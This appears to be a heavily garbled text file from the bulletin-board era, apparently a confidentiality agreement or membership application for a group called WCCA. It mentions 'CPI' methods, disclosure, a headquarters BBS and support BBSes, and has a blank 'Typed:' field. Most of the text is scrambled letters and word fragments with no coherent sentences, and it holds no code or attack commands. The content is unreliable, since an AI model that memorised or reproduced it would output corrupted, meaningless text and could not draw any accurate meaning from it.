pCPIuses ishmyldu y, al yed heIrelow,roo urholm ttmogst feaceconfidencej pCPI'ttationf tse,con cIlegine you uony indou aoy-paI hangnsporrforeenne nee tlennetmore CANNET bnduor Iagaiws pCPIdhe aetsomeof dsi in seerurt plaw.cIlfulitohisttstchantdatser I h eto btcute affiliaredha bre ttmor of tf tse wialses wonly bthmyldu yowornsmrithmyand ynhe sacy meof dshipi ifrmylpositor npt * ed itand yittcontrndh on yowowsors ttmogsy r, CPIdhe aets meof ds.cIlOMsoger prehehantdatser I h eto bteconfro* ed byettmor of tf tse, iismyldu yo rd CPIdmeof dusal yed heIrelow,riatorentherodisclos or . 
scueat CPI'ttationf tse nM rogm;caviev r,mer I do, 1efulitoegine you uttmoindou aoy-p disclos d or . scueaeiesanttemeten bnduor Iagaiws pCPId tlennemeof d(s) pCPI in seerurt plaw.cIlfurstandagine you uoM ftherterme he ans ioia ietwocrotteed thrmeOMsogcordsir-pm nM rogrely,rnagly ree pWCCA,iWeaceCoaaceCord Pred Athe iancei Typtd:____________________ ----------------------------------------------------------------------------- .AeswttlEnchhQuesoy-paTo thenBeaceAom FutheaceOf Your At of t. ----------------------------------------------------------------------------- Up souRALL Apo ons or saTo thenWCCA Htadquarters BBS T H DB 0FA N D R O M DBD Attt S T R AtI N Futu moWCCA Supporr BBS's We anBerAc and -OApo ons or saMayeBerTur heIIn!Tden